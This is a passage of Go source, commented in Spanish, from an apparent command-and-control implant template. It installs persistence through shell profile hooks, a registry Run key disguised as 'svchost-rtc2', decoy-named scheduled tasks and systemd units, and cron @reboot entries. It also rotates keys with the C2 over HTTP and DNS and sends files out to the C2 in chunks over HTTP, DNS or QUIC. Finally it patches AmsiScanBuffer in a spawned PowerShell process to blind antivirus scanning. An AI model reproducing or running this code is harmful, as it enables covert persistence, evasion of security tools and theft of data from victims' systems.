		return nil, "persist profile: solo disponible en Linux"
	}
	home, err := os.UserHomeDir()
	if err != nil {
		return nil, fmt.Sprintf("persist profile: obtener home: %v", err)
	}
	// Preferir .profile (se ejecuta en login shells); fallback a .bashrc.
	target := filepath.Join(home, ".profile")
	if _, err := os.Stat(target); os.IsNotExist(err) {
		target = filepath.Join(home, ".bashrc")
	}
	data, _ := os.ReadFile(target)
	marker := "# session restore"
	line := fmt.Sprintf("\n%s\n[ -x '%s' ] && '%s' >/dev/null 2>&1 &\n", marker, exe, exe)
	if strings.Contains(string(data), marker) {
		return []byte("persist profile: hook ya existe\n"), ""
	}
	f, err := os.OpenFile(target, os.O_APPEND|os.O_WRONLY, 0o644)
	if err != nil {
		return nil, fmt.Sprintf("persist profile: abrir %s: %v", target, err)
	}
	defer f.Close()
	if _, err := f.WriteString(line); err != nil {
		return nil, fmt.Sprintf("persist profile: escribir: %v", err)
	}
	return []byte(fmt.Sprintf("persist profile: hook añadido a %s\n", target)), ""
}

func unpersistProfile() ([]byte, string) {
	if runtime.GOOS != "linux" {
		return nil, "unpersist profile: solo disponible en Linux"
	}
	home, err := os.UserHomeDir()
	if err != nil {
		return nil, fmt.Sprintf("unpersist profile: obtener home: %v", err)
	}
	removed := 0
	for _, name := range []string{".profile", ".bashrc"} {
		path := filepath.Join(home, name)
		data, err := os.ReadFile(path)
		if err != nil {
			continue
		}
		lines := strings.Split(string(data), "\n")
		var keep []string
		skip := false
		for i, l := range lines {
			if l == "# session restore" && i+1 < len(lines) && strings.Contains(lines[i+1], "implant_") || strings.Contains(l, "implant_") && strings.Contains(l, ">/dev/null 2>&1 &") {
				skip = true
				removed++
				continue
			}
			if skip {
				skip = false // saltar también la línea del comando
				continue
			}
			keep = append(keep, l)
		}
		if removed > 0 {
			os.WriteFile(path, []byte(strings.Join(keep, "\n")), 0o644)
		}
	}
	return []byte(fmt.Sprintf("unpersist profile: %d hooks eliminados\n", removed)), ""
}

// ── Windows: Run/RunOnce key ────────────────────────────────────────────
// Usa "reg add" / "reg delete" en vez de importar golang.org/x/sys/windows
// para que el template no añada dependencias externas al implant.

func persistRegistry(exe string) ([]byte, string) {
	if runtime.GOOS != "windows" {
		return nil, "persist registry: solo disponible en Windows"
	}
	// HKCU\...\Run — arranca el ejecutable en cada inicio de sesión del
	// usuario. No requiere elevación.
	out, err := exec.Command("reg", "add",
		"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
		"/v", "svchost-rtc2", "/t", "REG_SZ", "/d", exe, "/f",
	).CombinedOutput()
	if err != nil {
		return out, fmt.Sprintf("persist registry: %v", err)
	}
	return []byte(fmt.Sprintf("persist registry: HKCU Run key creado = %s\n", exe)), ""
}

func unpersistRegistry() ([]byte, string) {
	if runtime.GOOS != "windows" {
		return nil, "unpersist registry: solo disponible en Windows"
	}
	out, err := exec.Command("reg", "delete",
		"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
		"/v", "svchost-rtc2", "/f",
	).CombinedOutput()
	if err != nil {
		return out, fmt.Sprintf("unpersist registry: %v", err)
	}
	return []byte("unpersist registry: HKCU Run key eliminada\n"), ""
}

// ── Windows: scheduled task ─────────────────────────────────────────────

func persistSchTask(exe string) ([]byte, string) {
	if runtime.GOOS != "windows" {
		return nil, "persist schtask: solo disponible en Windows"
	}
	// Tier 1 (decoy): nombre que mimetiza software legítimo pero la tarea
	// sigue siendo enumerable por schtasks/Get-ScheduledTask. /SC ONLOGON
	// arranca en cada logon; /RL LIMITED evita pedir elevación.
	svc, _ := stealthNames(exe)
	_, err := exec.Command("schtasks", "/Create", "/F", "/TN", svc,
		"/TR", exe, "/SC", "ONLOGON", "/RL", "LIMITED").CombinedOutput()
	if err != nil {
		return nil, fmt.Sprintf("persist schtask: %v", err)
	}
	return []byte(fmt.Sprintf("persist schtask: tarea '%s' creada (ONLOGON)\n", svc)), ""
}

func unpersistSchTask() ([]byte, string) {
	if runtime.GOOS != "windows" {
		return nil, "unpersist schtask: solo disponible en Windows"
	}
	// El nombre debe coincidir con el que persistSchTask creó. Como ambos
	// derivan de la ruta del ejecutable actual, recalculamos el mismo.
	exe, err := os.Executable()
	if err != nil {
		return nil, fmt.Sprintf("unpersist schtask: obtener ruta: %v", err)
	}
	svc, _ := stealthNames(exe)
	_, err = exec.Command("schtasks", "/Delete", "/F", "/TN", svc).CombinedOutput()
	if err != nil {
		return nil, fmt.Sprintf("unpersist schtask: %v", err)
	}
	return []byte(fmt.Sprintf("unpersist schtask: tarea '%s' eliminada\n", svc)), ""
}

// ── Linux: systemd user unit ────────────────────────────────────────────

func persistSystemd(exe string) ([]byte, string) {
	if runtime.GOOS != "linux" {
		return nil, "persist systemd: solo disponible en Linux"
	}
	home, err := os.UserHomeDir()
	if err != nil {
		return nil, fmt.Sprintf("persist systemd: obtener home: %v", err)
	}
	// Tier 1 (decoy): nombre mimetizado. systemd básico no oculta el
	// binario en ExecStart; para stealth usar el método 'stealth'.
	svc, disp := stealthNames(exe)
	systemdDir := filepath.Join(home, ".config", "systemd", "user")
	if err := os.MkdirAll(systemdDir, 0o755); err != nil {
		return nil, fmt.Sprintf("persist systemd: crear %s: %v", systemdDir, err)
	}

	unitPath := filepath.Join(systemdDir, svc+".service")
	unit := "[Unit]\n" +
		"Description=" + disp + "\n\n" +
		"[Service]\n" +
		"ExecStart=" + exe + "\n" +
		"Restart=always\n" +
		"RestartSec=30\n\n" +
		"[Install]\n" +
		"WantedBy=default.target\n"
	if err := os.WriteFile(unitPath, []byte(unit), 0o644); err != nil {
		return nil, fmt.Sprintf("persist systemd: escribir %s: %v", unitPath, err)
	}

	// Habilitar la unidad para que arranque con la sesión de usuario.
	// No requiere root: systemd --user gestiona el servicio del usuario.
	if out, err := exec.Command("systemctl", "--user", "daemon-reload").CombinedOutput(); err != nil {
		return nil, fmt.Sprintf("persist systemd: daemon-reload: %v (%s)", err, strings.TrimSpace(string(out)))
	}
	if out, err := exec.Command("systemctl", "--user", "enable", svc+".service").CombinedOutput(); err != nil {
		return nil, fmt.Sprintf("persist systemd: enable: %v (%s)", err, strings.TrimSpace(string(out)))
	}
	return []byte(fmt.Sprintf("persist systemd: unidad %s creada y habilitada\n", unitPath)), ""
}

func unpersistSystemd() ([]byte, string) {
	if runtime.GOOS != "linux" {
		return nil, "unpersist systemd: solo disponible en Linux"
	}
	home, err := os.UserHomeDir()
	if err != nil {
		return nil, fmt.Sprintf("unpersist systemd: obtener home: %v", err)
	}
	exe, err := os.Executable()
	if err != nil {
		return nil, fmt.Sprintf("unpersist systemd: obtener ruta: %v", err)
	}
	svc, _ := stealthNames(exe)
	unitPath := filepath.Join(home, ".config", "systemd", "user", svc+".service")

	// Intentar deshabilitar (puede fallar si nunca se habilitó).
	_, _ = exec.Command("systemctl", "--user", "disable", svc+".service").CombinedOutput()
	_, _ = exec.Command("systemctl", "--user", "stop", svc+".service").CombinedOutput()
	_, _ = exec.Command("systemctl", "--user", "daemon-reload").CombinedOutput()

	if err := os.Remove(unitPath); err != nil && !os.IsNotExist(err) {
		return nil, fmt.Sprintf("unpersist systemd: borrar %s: %v", unitPath, err)
	}
	return []byte(fmt.Sprintf("unpersist systemd: unidad %s eliminada\n", unitPath)), ""
}

// ── Linux: cron @reboot ────────────────────────────────────────────────

func persistCron(exe string) ([]byte, string) {
	if runtime.GOOS != "linux" {
		return nil, "persist cron: solo disponible en Linux"
	}
	// Leer crontab actual, añadir línea si no existe.
	out, err := exec.Command("crontab", "-l").Output()
	if err != nil && len(out) == 0 {
		// crontab puede fallar si está vacío; es aceptable.
		out = []byte{}
	}
	marker := "@reboot " + exe
	lines := strings.Split(strings.TrimRight(string(out), "\n"), "\n")
	for _, l := range lines {
		if strings.Contains(l, marker) {
			return []byte("persist cron: entrada ya existe\n"), ""
		}
	}
	newCron := strings.TrimRight(string(out), "\n")
	if newCron != "" {
		newCron += "\n"
	}
	newCron += marker + "\n"
	cmd := exec.Command("crontab", "-")
	cmd.Stdin = strings.NewReader(newCron)
	if out2, err := cmd.CombinedOutput(); err != nil {
		return nil, fmt.Sprintf("persist cron: instalar crontab: %v (%s)", err, strings.TrimSpace(string(out2)))
	}
	return []byte("persist cron: @reboot entrada añadida\n"), ""
}

func unpersistCron() ([]byte, string) {
	if runtime.GOOS != "linux" {
		return nil, "unpersist cron: solo disponible en Linux"
	}
	out, err := exec.Command("crontab", "-l").Output()
	if err != nil {
		return []byte("unpersist cron: crontab vacío o inaccesible\n"), ""
	}
	lines := strings.Split(strings.TrimRight(string(out), "\n"), "\n")
	var keep []string
	removed := false
	for _, l := range lines {
		if strings.HasPrefix(l, "@reboot ") && strings.Contains(l, "implant_") || strings.HasPrefix(l, "@reboot ") && strings.Contains(l, "rtc2") {
			removed = true
			continue
		}
		keep = append(keep, l)
	}
	if !removed {
		return []byte("unpersist cron: ninguna entrada rtc2 encontrada\n"), ""
	}
	newCron := strings.Join(keep, "\n")
	if newCron != "" {
		newCron += "\n"
	}
	cmd := exec.Command("crontab", "-")
	cmd.Stdin = strings.NewReader(newCron)
	if _, err := cmd.CombinedOutput(); err != nil {
		return nil, fmt.Sprintf("unpersist cron: instalar crontab: %v", err)
	}
	return []byte("unpersist cron: entradas rtc2 eliminadas\n"), ""
}

func handleRekeyRequestHTTP(
	profile *profiles.Profile,
	implantID string,
	sc *crypto.SessionCrypto,
	encrypted []byte,
) error {
	debugLog("rekey HTTP: descifrando server_eph_pub")
	serverEphPub, err := decodeServerEphPub(sc, encrypted)
	if err != nil {
		return err
	}

	debugLog("rekey HTTP: generando par efímero")
	ephPriv, ephPub, err := crypto.GenerateKeyPair()
	if err != nil {
		return err
	}

	// Responder BAJO CLAVES VIEJAS.
	resp := map[string]string{
		"implant_eph_pub": base64.StdEncoding.EncodeToString(ephPub.Bytes()),
	}
	respJSON, _ := json.Marshal(resp)
	encResp, err := sc.EncryptForC2(respJSON, nil)
	if err != nil {
		return err
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResp}
	wrapJSON, _ := json.Marshal(wrapper)
	resEnv := protocol.NewEnvelope(protocol.MsgKeyRotation, wrapJSON)
	resBytes, _ := resEnv.Marshal()

	httpReq, err := http.NewRequest("POST", ListenerURL, bytes.NewReader(resBytes))
	if err != nil {
		return err
	}
	profile.ApplyHeaders(httpReq)
	httpReq.Header.Set("Content-Type", "application/octet-stream")

	debugLog("rekey HTTP: enviando implant_eph_pub")
	client, err := newHTTPClient()
	if err != nil {
		return fmt.Errorf("crear http client: %w", err)
	}
	resp2, err := client.Do(httpReq)
	if err != nil {
		return err
	}
	defer resp2.Body.Close()
	debugLog("rekey HTTP: respuesta HTTP %d", resp2.StatusCode)

	if resp2.StatusCode != http.StatusOK {
		_, _ = io.Copy(io.Discard, resp2.Body)
		return fmt.Errorf("rekey: server respondió %d", resp2.StatusCode)
	}

	if err := sc.ApplyRekeyAsBeacon(ephPriv, serverEphPub); err != nil {
		_, _ = io.Copy(io.Discard, resp2.Body)
		return err
	}
	debugLog("rekey HTTP: rekey aplicado localmente, descifrando ack")

	body, err := io.ReadAll(resp2.Body)
	if err != nil {
		return fmt.Errorf("rekey: leer ack: %w", err)
	}
	respEnv, err := protocol.UnmarshalEnvelope(body)
	if err != nil {
		return fmt.Errorf("rekey: unmarshal ack: %w", err)
	}
	if respEnv.Type != protocol.MsgKeyRotation {
		return fmt.Errorf("rekey: tipo de ack inesperado: %d", respEnv.Type)
	}
	ack, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return fmt.Errorf("rekey: descifrar ack: %w", err)
	}
	if string(ack) != "ok" {
		return fmt.Errorf("rekey: ack inesperado: %q", ack)
	}
	debugLog("rekey HTTP: ack OK, rekey completo")

	return nil
}

// handleRekeyRequestDNS es el equivalente DNS de handleRekeyRequestHTTP.
func handleRekeyRequestDNS(
	profile *profiles.DNSProfile,
	implantID string,
	sc *crypto.SessionCrypto,
	encrypted []byte,
) error {
	debugLog("rekey DNS: descifrando server_eph_pub")
	serverEphPub, err := decodeServerEphPub(sc, encrypted)
	if err != nil {
		return err
	}

	debugLog("rekey DNS: generando par efímero")
	ephPriv, ephPub, err := crypto.GenerateKeyPair()
	if err != nil {
		return err
	}

	resp := map[string]string{
		"implant_eph_pub": base64.StdEncoding.EncodeToString(ephPub.Bytes()),
	}
	respJSON, _ := json.Marshal(resp)
	encResp, err := sc.EncryptForC2(respJSON, nil)
	if err != nil {
		return err
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResp}
	wrapJSON, _ := json.Marshal(wrapper)
	resEnv := protocol.NewEnvelope(protocol.MsgKeyRotation, wrapJSON)

	// Enviamos la respuesta bajo claves VIEJAS y obtenemos el ack.
	debugLog("rekey DNS: enviando implant_eph_pub")
	respEnv, err := exchangeDNS(profile, resEnv, implantID)
	if err != nil {
		return err
	}

	if err := sc.ApplyRekeyAsBeacon(ephPriv, serverEphPub); err != nil {
		return err
	}
	debugLog("rekey DNS: rekey aplicado localmente, descifrando ack")

	if respEnv.Type != protocol.MsgKeyRotation {
		return fmt.Errorf("dns rekey: tipo de ack inesperado: %d", respEnv.Type)
	}
	ack, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return fmt.Errorf("dns rekey: descifrar ack: %w", err)
	}
	if string(ack) != "ok" {
		return fmt.Errorf("dns rekey: ack inesperado: %q", ack)
	}
	debugLog("rekey DNS: ack OK, rekey completo")

	return nil
}

// decodeServerEphPub descifra un payload MsgKeyRotation y devuelve la
// ephPub del server.
func decodeServerEphPub(sc *crypto.SessionCrypto, encrypted []byte) (*ecdh.PublicKey, error) {
	plaintext, err := sc.DecryptFromC2(encrypted, nil)
	if err != nil {
		return nil, err
	}
	var req struct {
		ServerEphPub string ` + "`json:\"server_eph_pub\"`" + `
	}
	if err := json.Unmarshal(plaintext, &req); err != nil {
		return nil, err
	}
	raw, err := base64.StdEncoding.DecodeString(req.ServerEphPub)
	if err != nil {
		return nil, err
	}
	return crypto.PublicKeyFromBytes(raw)
}

func sleepWithJitter() {
	if jitterPerc <= 0 {
		debugLog("sleep: %ds (sin jitter)", sleepSecs)
		time.Sleep(time.Duration(sleepSecs) * time.Second)
		return
	}
	jitter := big.NewInt(int64(sleepSecs * jitterPerc / 100))
	if jitter.Sign() <= 0 {
		debugLog("sleep: %ds (jitter 0)", sleepSecs)
		time.Sleep(time.Duration(sleepSecs) * time.Second)
		return
	}
	n, _ := rand.Int(rand.Reader, jitter)
	sleep := time.Duration(sleepSecs)*time.Second + time.Duration(n.Int64())*time.Second
	debugLog("sleep: %s (base %ds + jitter)", sleep, sleepSecs)
	time.Sleep(sleep)
}

// randomSessionKey genera un identificador corto (12 chars base36 ≈ 62 bits)
// que se usa como contexto HKDF en la derivación de claves y como
// session_key del implante en la DB.
func randomSessionKey() string {
	b := make([]byte, 12)
	rand.Read(b)
	const charset = "abcdefghijklmnopqrstuvwxyz0123456789"
	out := make([]byte, len(b))
	for i, v := range b {
		out[i] = charset[int(v)%len(charset)]
	}
	return string(out)
}

// ════════════════════════════════════════════════════════════════════
// Transferencia chunked
// ════════════════════════════════════════════════════════════════════

// runDownloadChunked lee un archivo y lo envía al C2 en chunks usando el
// transporte activo. Devuelve un resumen pequeño como resultado de la
// tarea; el archivo en sí llega al server como mensajes MsgFileChunk
// independientes que el TransferManager reensambla.
func runDownloadChunked(path string) ([]byte, string) {
	data, err := os.ReadFile(resolvePath(path))
	if err != nil {
		return nil, err.Error()
	}
	if len(data) == 0 {
		return []byte("archivo vacío, nada que enviar\n"), ""
	}

	sum := sha256.Sum256(data)
	transferID := randomTransferID()
	name := filepath.Base(path)
	chunkSize := chunkSizeForTransport()

	// Trocear.
	var chunks [][]byte
	for i := 0; i < len(data); i += chunkSize {
		end := i + chunkSize
		if end > len(data) {
			end = len(data)
		}
		chunks = append(chunks, data[i:end])
	}

	debugLog("download: %s (%d bytes) → %d chunks de %d bytes",
		name, len(data), len(chunks), chunkSize)

	// 1. start
	start := protocol.FileTransferWire{
		Kind:       "start",
		TransferID: transferID,
		TaskID:     currentTaskID,
		Direction:  "to_c2",
		Path:       path,
		Name:       name,
		TotalSize:  int64(len(data)),
		SHA256:     hex.EncodeToString(sum[:]),
		ChunkCount: len(chunks),
	}
	if err := sendFileWire(start); err != nil {
		return nil, fmt.Sprintf("transfer start: %v", err)
	}

	// 2. chunks
	for i, chunk := range chunks {
		wire := protocol.FileTransferWire{
			Kind:       "chunk",
			TransferID: transferID,
			Index:      i,
			Data:       chunk,
		}
		if err := sendFileWire(wire); err != nil {
			_ = sendFileWire(protocol.FileTransferWire{
				Kind:       "end",
				TransferID: transferID,
				OK:         false,
				Error:      fmt.Sprintf("chunk %d: %v", i, err),
			})
			return nil, fmt.Sprintf("transfer chunk %d: %v", i, err)
		}
		debugLog("download: chunk %d/%d enviado (%d bytes)", i+1, len(chunks), len(chunk))
		// Pequeña pausa en DNS para no saturar.
		if senderTransport == "dns" {
			time.Sleep(30 * time.Millisecond)
		}
	}

	// 3. end
	if err := sendFileWire(protocol.FileTransferWire{
		Kind:       "end",
		TransferID: transferID,
		OK:         true,
	}); err != nil {
		return nil, fmt.Sprintf("transfer end: %v", err)
	}

	return []byte(fmt.Sprintf(
		"transfer completado: %s (%d bytes, %d chunks, sha256=%s)\n",
		name, len(data), len(chunks), hex.EncodeToString(sum[:]),
	)), ""
}

// chunkSizeForTransport devuelve el tamaño de chunk apropiado para el
// transporte activo. DNS usa chunks pequeños (2 KB) para que cada uno
// quepa en el envelope con margen; el resto usa 1 MB.
func chunkSizeForTransport() int {
	if senderTransport == "dns" {
		return 2 * 1024
	}
	return 1024 * 1024
}

// randomTransferID genera un UUID v4 formateado, sin usar dependencias
// externas (el template no importa google/uuid).
func randomTransferID() string {
	b := make([]byte, 16)
	rand.Read(b)
	b[6] = (b[6] & 0x0f) | 0x40 // versión 4
	b[8] = (b[8] & 0x3f) | 0x80 // variante
	return fmt.Sprintf("%x-%x-%x-%x-%x",
		b[0:4], b[4:6], b[6:8], b[8:10], b[10:16])
}

// sendFileWire cifra y envía un FileTransferWire por el transporte activo.
func sendFileWire(wire protocol.FileTransferWire) error {
	if senderSc == nil || senderImplantID == "" {
		return fmt.Errorf("transfer: sin sesión activa")
	}

	plaintext, err := json.Marshal(wire)
	if err != nil {
		return fmt.Errorf("marshal: %w", err)
	}
	encrypted, err := senderSc.EncryptForC2(plaintext, nil)
	if err != nil {
		return fmt.Errorf("cifrar: %w", err)
	}
	wrapper := protocol.EncryptedWrapper{
		ImplantID: senderImplantID,
		Data:      encrypted,
	}
	wrapJSON, _ := json.Marshal(wrapper)
	env := protocol.NewEnvelope(protocol.MsgFileChunk, wrapJSON)

	switch senderTransport {
	case "http":
		return sendHTTPEnvelope(env)
	case "dns":
		_, err := exchangeDNS(senderProfileDNS, env, senderImplantID)
		return err
	case "quic":
		_, err := exchangeQUIC(senderProfileQUIC, env)
		return err
	default:
		return fmt.Errorf("transporte desconocido: %q", senderTransport)
	}
}

// sendHTTPEnvelope envía un envelope ya construido por HTTPS.
func sendHTTPEnvelope(env *protocol.Envelope) error {
	envBytes, err := env.Marshal()
	if err != nil {
		return err
	}
	httpReq, err := http.NewRequest("POST", ListenerURL, bytes.NewReader(envBytes))
	if err != nil {
		return err
	}
	if senderProfileHTTP != nil {
		senderProfileHTTP.ApplyHeaders(httpReq)
	}
	httpReq.Header.Set("Content-Type", "application/octet-stream")

	client, err := newHTTPClient()
	if err != nil {
		return err
	}
	resp, err := client.Do(httpReq)
	if err != nil {
		return err
	}
	resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return fmt.Errorf("HTTP %d", resp.StatusCode)
	}
	return nil
}

// silenciarWarnings evita que el compilador se queje si en alguna
// configuración de build no se usan estos símbolos. No tiene efecto
// en runtime.
var _ = errors.New
`

// amsiWindowsSource es el contenido de amsi_windows.go. Se escribe en el
// directorio de build solo cuando target=windows. Contiene la
// implementación real del patch de AMSI.
const amsiWindowsSource = `//go:build windows

package main

import (
	"fmt"
	"os"
	"os/exec"
	"strings"
	"syscall"
	"time"
	"unsafe"

	"golang.org/x/sys/windows"
)

var (
	amsiKernel32 = windows.NewLazySystemDLL("kernel32.dll")
	amsiPsapi    = windows.NewLazySystemDLL("psapi.dll")

	procCreateProcessW       = amsiKernel32.NewProc("CreateProcessW")
	procVirtualProtectEx     = amsiKernel32.NewProc("VirtualProtectEx")
	procWriteProcessMemory   = amsiKernel32.NewProc("WriteProcessMemory")
	procResumeThread         = amsiKernel32.NewProc("ResumeThread")
	procSuspendThread        = amsiKernel32.NewProc("SuspendThread")
	procWaitForSingleObject  = amsiKernel32.NewProc("WaitForSingleObject")
	procGetExitCodeProcess   = amsiKernel32.NewProc("GetExitCodeProcess")
	procCloseHandle          = amsiKernel32.NewProc("CloseHandle")
	procGetModuleHandleW     = amsiKernel32.NewProc("GetModuleHandleW")
	procGetProcAddress       = amsiKernel32.NewProc("GetProcAddress")
	procEnumProcessModulesEx = amsiPsapi.NewProc("EnumProcessModulesEx")
	procGetModuleBaseNameW   = amsiPsapi.NewProc("GetModuleBaseNameW")
)

// amsiPatch es el shellcode que se escribe sobre AmsiScanBuffer:
//
//	mov eax, 0x80070057   ; E_INVALIDARG
//	ret
//
// Con eso cualquier llamada a AmsiScanBuffer devuelve error inmediato
// y AMSI deja de detectar. Es la técnica estándar de la industria.
var amsiPatch = []byte{0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3}

const amsiLIST_MODULES_ALL = 0x03

// runShellWindowsAMSI ejecuta una línea de comandos en Windows. Si
// contiene "powershell", crea el proceso, le parchea AmsiScanBuffer en
// memoria, y lo reanuda. Si no contiene powershell, ejecuta con
// cmd.exe normal.
func runShellWindowsAMSI(cmdline string) ([]byte, string) {
	lower := strings.ToLower(cmdline)
	if !strings.Contains(lower, "powershell") {
		out, err := exec.Command("cmd.exe", "/C", cmdline).CombinedOutput()
		if err != nil {
			return out, err.Error()
		}
		return out, ""
	}

	// Extraer la línea de comandos de PowerShell tras "powershell".
	// Aceptamos las formas:
	//   powershell -c "..."
	//   powershell.exe -c "..."
	//   powershell -Command "..."
	psCmdline := extractPowerShellCmdline(cmdline)
	if psCmdline == "" {
		psCmdline = "powershell.exe " + cmdline
	}

	out, err := runPowerShellWithAMSIPatch(psCmdline)
	if err != nil {
		return nil, fmt.Sprintf("amsi patch: %v", err)
	}
	return out, ""
}

// extractPowerShellCmdline recorta "powershell[.exe] [flags]" del
// principio de cmdline y deja el resto tal cual, ya listo para
// CreateProcessW.
func extractPowerShellCmdline(cmdline string) string {
	lower := strings.ToLower(cmdline)
	idx := strings.Index(lower, "powershell")
	if idx < 0 {
		return ""
	}
	rest := cmdline[idx:]
	// Recortar "powershell" o "powershell.exe"
	if strings.HasPrefix(strings.ToLower(rest), "powershell.exe") {
		rest = rest[len("powershell.exe"):]
	} else {
		rest = rest[len("powershell"):]
	}
	return "powershell.exe" + rest
}

// runPowerShellWithAMSIPatch lanza powershell.exe con la línea dada,
// espera a que cargue amsi.dll, suspende el hilo, parchea AmsiScanBuffer
// en el proceso remoto, y lo reanuda. Devuelve stdout+stderr del hijo.
func runPowerShellWithAMSIPatch(psCmdline string) ([]byte, error) {
	cmdLineW, err := syscall.UTF16PtrFromString(psCmdline)
	if err != nil {
		return nil, err
	}

	var si windows.StartupInfo
	var pi windows.ProcessInformation
	si.Cb = uint32(unsafe.Sizeof(si))

	outR, outW, err := osPipe()
	if err != nil {
		return nil, err
	}
	errR, errW, err := osPipe()
	if err != nil {
		outR.Close()
		outW.Close()
		return nil, err
	}

	si.Flags |= windows.STARTF_USESTDHANDLES
	si.StdOutput = windows.Handle(outW.Fd())
	si.StdErr = windows.Handle(errW.Fd())

	r, _, errno := procCreateProcessW.Call(
		0,
		uintptr(unsafe.Pointer(cmdLineW)),
		0, 0, 1, // bInheritHandles=1 → los handles StdOutput/StdErr se heredan
		0,
		0, 0,
		uintptr(unsafe.Pointer(&si)),
		uintptr(unsafe.Pointer(&pi)),
	)
	outW.Close()
	errW.Close()
	if r == 0 {
		outR.Close()
		errR.Close()
		return nil, fmt.Errorf("CreateProcessW: %v", errno)
	}
	defer procCloseHandle.Call(uintptr(pi.Thread))
	defer procCloseHandle.Call(uintptr(pi.Process))

	// Leer stdout y stderr CONCURRENTEMENTE, una goroutine por pipe.
	// Sin esto, si el hijo escribe mucho en stderr mientras nadie lee
	// de ese pipe, el buffer del pipe se llena y el hijo se bloquea
	// esperando. El padre, mientras tanto, sigue bloqueado en
	// outR.Read() → deadlock.
	outputCh := make(chan []byte, 2)
	readPipe := func(f *os.File) {
		var buf []byte
		tmp := make([]byte, 4096)
		for {
			n, err := f.Read(tmp)
			if n > 0 {
				buf = append(buf, tmp[:n]...)
			}
			if err != nil {
				break
			}
		}
		outputCh <- buf
	}
	go readPipe(outR)
	go readPipe(errR)

	// Dar tiempo a PowerShell a cargar amsi.dll y el CLR.
	time.Sleep(300 * time.Millisecond)

	if r, _, _ := procWaitForSingleObject.Call(uintptr(pi.Process), 0); r == 0 {
		debugLog("amsi: powershell terminó antes del patch, saltando")
		outR.Close()
		errR.Close()
		stdout := <-outputCh
		stderr := <-outputCh
		return append(stdout, stderr...), nil
	}

	// Suspender el hilo principal para que no ejecute el script mientras
	// parcheamos.
	procSuspendThread.Call(uintptr(pi.Thread))

	if err := patchRemoteAMSI(pi.ProcessId); err != nil {
		procResumeThread.Call(uintptr(pi.Thread))
		procWaitForSingleObject.Call(uintptr(pi.Process), 0xFFFFFFFF)
		outR.Close()
		errR.Close()
		// El hijo termina, los dos readPipe cierran por EOF y envían
		// sus buffers. Hay exactamente 2 envíos en el channel.
		<-outputCh
		<-outputCh
		return nil, fmt.Errorf("patch: %w", err)
	}

	// Reanudar y esperar.
	procResumeThread.Call(uintptr(pi.Thread))
	procWaitForSingleObject.Call(uintptr(pi.Process), 0xFFFFFFFF)

	// Cerrar los read-ends fuerza a readPipe a salir aunque el hijo no
	// haya cerrado sus handles por algún motivo.
	outR.Close()
	errR.Close()

	stdout := <-outputCh
	stderr := <-outputCh
	combined := append(stdout, stderr...)
	return combined, nil
}

func patchRemoteAMSI(pid uint32) error {
	// 1. Encontrar amsi.dll con ToolHelp32 (no requiere handle abierto).
	remoteBase, err := findRemoteModuleBase(pid, "amsi.dll")
	if err != nil {
		return fmt.Errorf("find amsi.dll: %w", err)
	}

	// 2. Offset local.
	localBase, localScanBuf, err := findLocalAmsiScanBuffer()
	if err != nil {
		return fmt.Errorf("local amsi: %w", err)
	}
	offset := localScanBuf - localBase
	remoteScanBuf := remoteBase + offset

	debugLog("amsi: remote base=0x%X local base=0x%X offset=0x%X target=0x%X",
		remoteBase, localBase, offset, remoteScanBuf)

	// 3. Abrir handle para escribir.
	hProc, err := windows.OpenProcess(
		windows.PROCESS_VM_OPERATION|
			windows.PROCESS_VM_WRITE|
			windows.PROCESS_VM_READ,
		false,
		pid,
	)
	if err != nil {
		return fmt.Errorf("OpenProcess: %w", err)
	}
	defer windows.CloseHandle(hProc)

	// 4. VirtualProtectEx + WriteProcessMemory.
	var oldProtect uint32
	r, _, errno := procVirtualProtectEx.Call(
		uintptr(hProc),
		remoteScanBuf,
		uintptr(len(amsiPatch)),
		windows.PAGE_EXECUTE_READWRITE,
		uintptr(unsafe.Pointer(&oldProtect)),
	)
	if r == 0 {
		return fmt.Errorf("VirtualProtectEx RWX: %v (addr=0x%X)", errno, remoteScanBuf)
	}

	var written uintptr
	r, _, errno = procWriteProcessMemory.Call(
		uintptr(hProc),
		remoteScanBuf,
		uintptr(unsafe.Pointer(&amsiPatch[0])),
		uintptr(len(amsiPatch)),
		uintptr(unsafe.Pointer(&written)),
	)
	if r == 0 || written != uintptr(len(amsiPatch)) {
		return fmt.Errorf("WriteProcessMemory: %v (escritos %d)", errno, written)
	}

	var tmp uint32
	procVirtualProtectEx.Call(
		uintptr(hProc),
		remoteScanBuf,
		uintptr(len(amsiPatch)),
		uintptr(oldProtect),
		uintptr(unsafe.Pointer(&tmp)),
	)

	debugLog("amsi: patched AmsiScanBuffer @ 0x%X (pid %d)", remoteScanBuf, pid)
	return nil
}

func findRemoteModuleBase(pid uint32, name string) (uintptr, error) {
	// TH32CS_SNAPMODULE (0x08) | TH32CS_SNAPMODULE32 (0x10)
	const snapFlags = 0x00000018

	snap, err := windows.CreateToolhelp32Snapshot(snapFlags, pid)
	if err != nil {
		return 0, fmt.Errorf("CreateToolhelp32Snapshot: %w", err)
	}
	defer windows.CloseHandle(snap)

	var entry windows.ModuleEntry32
	entry.Size = uint32(unsafe.Sizeof(entry))

	if err := windows.Module32First(snap, &entry); err != nil {
		return 0, fmt.Errorf("Module32First: %w", err)
	}

	for {
		modName := windows.UTF16ToString(entry.Module[:])
		if strings.EqualFold(modName, name) {
			return entry.ModBaseAddr, nil
		}
		if err := windows.Module32Next(snap, &entry); err != nil {
			if err == windows.ERROR_NO_MORE_FILES {
				break
			}
			return 0, fmt.Errorf("Module32Next: %w", err)
		}
	}
	return 0, fmt.Errorf("módulo %q no encontrado", name)
}

func findLocalAmsiScanBuffer() (uintptr, uintptr, error) {
	nameW, _ := syscall.UTF16PtrFromString("amsi.dll")
	h, _, _ := procGetModuleHandleW.Call(uintptr(unsafe.Pointer(nameW)))
	if h == 0 {
		amsi := windows.NewLazySystemDLL("amsi.dll")
		if err := amsi.Load(); err != nil {
			return 0, 0, fmt.Errorf("LoadLibrary: %w", err)
		}
		h, _, _ = procGetModuleHandleW.Call(uintptr(unsafe.Pointer(nameW)))
		if h == 0 {
			return 0, 0, fmt.Errorf("GetModuleHandleW falló tras LoadLibrary")
		}
	}
